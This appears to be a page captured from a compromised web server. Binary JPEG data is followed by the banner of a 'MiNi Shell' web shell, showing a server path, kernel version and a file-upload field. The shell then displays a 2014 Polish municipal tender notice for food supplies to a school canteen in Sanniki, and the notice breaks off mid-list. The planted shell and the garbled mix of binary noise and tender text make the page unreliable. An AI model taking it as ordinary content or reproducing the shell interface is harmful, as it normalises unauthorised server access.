JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20140813/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20140813/270956-N-2014.html

<p class="kh_header"><b>Sanniki: Zakup i dostawa artykułów spożywczych do stołówki Szkoły Podstawowej im. Fryderyka Chopina w Sannikach 
i Przedszkola Samorządowego w Sannikach w roku szkolnym 2014/2015</b><br>
<b>Numer ogłoszenia: 270956 - 2014; data zamieszczenia: 13.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sanniki , ul. Warszawska 169, 09-540 Sanniki, woj. mazowieckie, tel. 24 277 68 51, faks 24 277 68 51, 277 78 15.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sanniki.bip.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa artykułów spożywczych do stołówki Szkoły Podstawowej im. Fryderyka Chopina w Sannikach 
i Przedszkola Samorządowego w Sannikach w roku szkolnym 2014/2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa artykułów spożywczych do stołówki Szkoły Podstawowej im. Fryderyka Chopina w Sannikach i Przedszkola Samorządowego 
w Sannikach w roku szkolnym 2014/2015.  
Dostawa  artykułów objętych niniejszym zamówieniem odbywać się będzie w ilościach wcześniej zamówionych przez intendentki. 
Dostarczane produkty muszą spełniać wymogi sanitarnohigieniczne właściwe dla danej kategorii produktu w zakresie przewidzianym przez ustawę o bezpieczeństwie żywności.
Wszystkie nazwy produktów podane przez Zamawiającego w specyfikacji istotnych warunków zamówienia należy traktować jako standardy jakościowe. Zamawiający dopuszcza możliwość zaoferowania artykułów równoważnych. Artykuł równoważny powinien mieć parametry nie gorsze niż wskazany z nazwy produkt. W przypadku zaoferowania przez Wykonawcę artykułu równoważnego należy podać nazwę artykułu i producenta. Zamówienie obejmuje artykuły spożywcze z następujących grup asortymentowych: 1. Mięso, produkty mięsno-wędliniarskie i drób, 2. Mleko i przetwory mleczne, 3. Owoce i przetwory owocowe, 4. Warzywa i przetwory warzywne, 5. Przyprawy, makarony, mąki i kasze, 6. Ryby, 7. Pieczywo. Szczegółowy zakres przedmiotu zamówienia określony jest w opisie części zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 Ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 Ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 Ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 Ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 Ustawy Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz pozostałych dokumentów składających się na ofertę: Formularz ofertowy - załącznik nr 1 do SIWZ, Kalkulacja cenowa - załącznik nr 5 do SIWZ. Wykonawca wypełnia formularz ofertowy oraz kalkulację cenową w zakresie oferowanych do wykonania części. Dokumenty wymagane w przypadku składania oferty wspólnej. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i do zawarcia umowy. Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. III.4.2), III.4.4 oraz Oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust.1 Ustawy - Prawo zamówień publicznych- wg załącznika nr 2 do SIWZ dla każdego wykonawcy z osobna, pozostałe dokumenty mogą być złożone wspólnie. Dokumenty podmiotów zagranicznych. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3.1) zastępuje się je dokumentem zawierającym oświadczenie w który określa się także osoby uprawnione do reprezentacji wykonawcy złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawione z odpowiednią datą wymaganą dla tych dokumentów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie zmiany i uzupełnienia treści niniejszej umowy mogą być dokonane za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności. 2. Zamawiający dopuszcza możliwość dokonania w umowie następujących zmian: 2.1.zmiana gramatury dostarczanych produktów w przypadku wprowadzenia przez producenta innej gramatury niż określona w ofercie Wykonawcy, 2.2. zmiana asortymentu w przypadku wstrzymania, zaprzestania produkcji, wycofania z rynku lub zmiany marki, z zastrzeżeniem, iż oferowany zamiennik musi odpowiadać parametrom co najmniej takim jak oferowany produkt, z gwarancję zachowania oferowanej ceny, 2.3. zmiana cen produktów w przypadku, gdy z powodu istotnej zmiany ceny nieprzewidzianej przy zawarciu umowy, spełnienie przedmiotu umowy groziłoby jednej ze stron rażącą stratą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sanniki.bip.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Sannikach,
ul. Warszawska 169, 
09-540 Sanniki,
pokój nr 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.08.2014 godzina 09:50, miejsce: Urząd Gminy w Sannikach,
ul. Warszawska 169, 
09-540 Sanniki,
pokój nr 10 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup i dostawa mięsa, produktów mięsno-wędliniarskich i drobiu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane zapotrzebowanie miesięczne na wskazane artykuły spożywcze: 
Lp.	Nazwa produktu	Zapotrzebowanie na miesiąc	jednostki
1	schab z kością	18	kg
2	schab bez kości	20	Kg
3	pachwina wędzona	6	Kg
4	łopatka bez kości	28	Kg
5	żeberka	32	Kg
6	wołowina rosołowa	7	Kg
7	golonka	2	Kg
8	mięso mielone	20	kg
9	mięso na gulasz	24	kg
10	flaki drobiowe	11	kg
11	boczek	6	kg
12	wołowina bez kości	5	kg
13	polędwica sopocka	5	kg
14	kiełbasa podwawelska	11	kg
15	kiełbasa biała surowa	14	kg
16	kiełbasa zwyczajna	1	kg
17	kiełbasa szynkówka	5	kg
18	kiełbasa śląska	4	kg
19	kaszanka	1	kg
20	Pasztetowa drobiowa Duda lub równoważna	3	kg
21	salceson	1	kg
22	szynka z indyka	13	kg
23	szynka	5	kg
24	pasztet drobiowy (puszka)- 155 g	8	szt.
25	kiełbasa parówkowa	3	kg
26	mortadela	3	kg
27	kurczaki	74	kg
28	udka	22	kg
29	żołądki	5	kg
30	piersi z kością	30	kg
31	porcje rosołowe	12	kg
32	skrzydełka	36	kg
33	filet z kurczaka	20	kg
34	wątróbka drobiowa	11	kg
35	pałeczki z kurczaka	46	kg
36	serduszka drobiowe	5	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup i dostawa mleka i przetworów mlecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane zapotrzebowanie miesięczne na wskazane artykuły spożywcze: 
Lp.	Nazwa produktu	Zapotrzebowanie na miesiąc	Jednostki
1	ser biały - półtłusty	52	kg
2	mleko w folii 2%	91	litry
3	śmietana 30% (0,5l)	105	szt.
4	masło śmietankowe - 200g	107	szt.
5	masło roślinne w kubku - 250g	41	szt.
6	serek Danio lub równoważny - 150g	197	szt.
7	serek Twój smak lub równoważny - 200g	10	szt.
8	ser żółty Gouda lub równoważny	4	kg
9	jogurt (mały)- 120g Danone Gratka lub równoważny	71	szt.
10	jogurt naturalny 390g	22	szt.
11	jogurt smakowy 150g	130	szt.
12	lody w kubku Ice Mastry 300 ml lub równoważne	20	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakup i dostawa owoców i przetworów mlecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane zapotrzebowanie miesięczne na wskazane artykuły spożywcze: 
L.p	Nazwa produktu	Zapotrzebowanie na miesiąc	Jednostki
1	jabłka	120	kg
2	cytryny	13	kg
3	banany	40	kg
4	dżem brzoskwiniowy 280g z Łowicza lub równoważny	26	szt.
5	dżem truskawkowy 280g z Łowicza lub równoważny	33	szt.
6	Dżem wiśniowy 280g Łowicz lub równoważny	15	szt.
7	powidła śliwkowe 400g	4	szt.
8	kompot wiśniowy	3	litry
9	sok Paola 440 ml lub równoważny	112	szt.
10	kompot truskawkowy	3	litry
11	mandarynki	7	kg
12	truskawki (produkty sezonowe)	20	kg
13	winogrona	1	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zakup i dostawa warzyw i przetworów warzywnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane zapotrzebowanie miesięczne na wskazane artykuły spożywcze: 
L.p	Nazwa produktu	Zapotrzebowanie na miesiąc	Jednostki
1	ziemniaki	720	kg
2	ziemniaki młode	100	kg
3	marchew	60	kg
4	pietruszka	26	kg
5	por	24	kg
6	pieczarki	10	kg
7	pomidory	12	kg
8	ogórki świeże	21	kg
9	groch	5	kg
10	koper	18	pęczki
11	natka pietruszki	21	pęczki
12	cebula	14	kg
13	kapusta pekińska	17	kg
14	kapusta biała	9	kg
15	kapusta młoda  w sezonie	20	szt.
16	kapusta kwaszona	23	kg
17	seler	18	kg
18	fasola szparagowa	4	kg
19	fasola	7	kg
20	kalafior świeży	3	kg
21	kalafior mrożony 450 g	7	szt.
22	fasola mrożona 450g	2	szt.
23	sałata	12	szt.
24	koncentrat pomidorowy 30%  190g	34	szt.
25	rzodkiewka	6	pęczki
26	chrzan biały w słoiku 200g	2	szt.
27	kapusta czerwona	5	kg
28	ogórki kwaszone	13	kg
29	kapusta włoska	3	szt.
30	przecier szczawiowy siekany w słoiku 200 g	20	szt.
31	ogórki konserwowe 900 ml	25	słoiki
32	buraki ćwikłowe	40	kg
33	kukurydza w puszcze  400 g	8	szt.
34	brokuły świeże	3	kg
35	szczypiorek	8	pęczki
36	groszek zielony w puszce - 400g	10	szt.
37	papryka surowa	1	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> zakup i dostawa przypraw, makaronów, mąki i kaszy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane zapotrzebowanie miesięczne na wskazane artykuły spożywcze: 
L.p	Nazwa produktu	Zapotrzebowanie na miesiąc	Jednostki
1	mąka szymanowska lub równoważna typ 480	26	kg
2	mąka pszenna typ 500	10	kg
3	makaron świderki - 400g Vela lub równoważny	21	szt.
4	makaron rosołowy - 400g Vela lub równoważny	60	szt.
5	makaron krajanka - 400g Vela lub równoważny	11	szt.
6	kasza manna Kupiec lub równoważna	4	kg
7	ryż Kupiec lub równoważny	15	kg
8	ryż w saszetkach 400g	10	szt.
9	kasza jęczmienna Kupiec lub równoważna	5	kg
10	kasza jęczmienna w saszetkach 400g	1	szt.
11	cukier	110	kg
12	sól	12	kg
13	kwasek cytrynowy 50g	12	szt.
14	liść laurowy 7 g	7	szt.
15	ketchup 900 g	1	szt.
16	keczup łagodny w tubce 480g Włocławek lub równoważny	10	szt.
17	mąka ziemniaczana Kupiec lub równoważna	2	kg
18	Przyprawa Vegeta lub równoważna - 200g 	80	szt.
19	barszcz biały 65 g	 48	szt.
20	majeranek 20g Cykoria lub równoważny	19	szt.
21	papryka słodka mielona 20g	4	szt.
22	pieprz mielony 20g	15	szt.
23	ziele angielskie 20g	4	szt.
24	kostki rosołowe drobiowe 60 g 	40	szt.
25	bulion w butelce 200g	10	szt.
26	płatki czekoladowe 500g Nestle (kulki) lub równoważne	5	szt.
27	płatki kukurydziane 500g Cornflakes lub równoważne	6	szt.
28	jajka duże	652	szt.
29	smalec 200 g	30	szt.
30	herbata granulowana  90g Saga lub równoważna	11	szt.
31	herbata granulowana  90g Lipton lub równoważna	10	szt.
32	olej uniwersalny 1 litrowy Kujawski lub równoważny	45	szt.
33	majonez 620 g pomorski Ocetix lub równoważny 	10	szt.
34	ocet 0,5 l 10%	1	szt.
35	batony - 43g Lion lub równoważne	10	szt.
36	cukier waniliowy 16 g Delecta lub równoważny	25	szt.
37	sos sałatkowy 9g Knorr lub równoważny	15	szt.
38	sos buraczany 200g	4	szt.
39	żurek 0,5 l	3	szt.
40	cynamon 15g	1	szt.
41	pieprz w ziarnach 20g	4	szt.
42	sos pieczarkowy 34g Winiary lub równoważny	6	szt.
43	sos grzybowy 40g	 7	szt.
44	budyń 64g 	20	szt.
45	kisiel 58g 	30	szt.
46	galaretka 75g Delecta lub równoważna	5	szt.
47	przyprawa do kurczaka 35g	5	szt.
48	herbata ekspresowa (100 torebek) Saga lub równoważna 	5	szt.
49	krem czekoladowy NUTELLA 180g lub równoważny	55	szt.
50	kakao granulowane Puchatek lub równoważne - 350g	4	szt.
51	kawa zbożowa INKA 150 g lub równoważna 	4	szt.
52	sos słodko-kwaśny (mały) 350g	50	szt.
53	zupa fasolowa 66 g Winiary lub równoważna	20	szt.
54	zupa grochowa 55 g Winiary lub równoważna	20	szt.
55	zupa pieczarkowa 45 g Winiary lub równoważna	20	szt.
56	Batony Grześki w polewie lub równoważne - 28g	215	szt.
57	Batony Grześki bez polewy lub równoważne - 28g	1	szt.
58	Batony 50g Góralki lub równoważne	223	szt.
59	soczek ze słomką -200 ml	81	szt.
60	musztarda mała 210 g	2	szt.
61	musztarda 280g sarepska w tubce Kamis lub równoważna	1	szt.
62	miód  naturalny wielokwiatowy 350g Podravka lub równoważny	3	szt.
63	czekolada gorzka 100 g	1	szt.
64	czekolada nadziewana 100g	30	szt.
65	batony Pawełki 45 g lub równoważne	1	szt..</p></li>
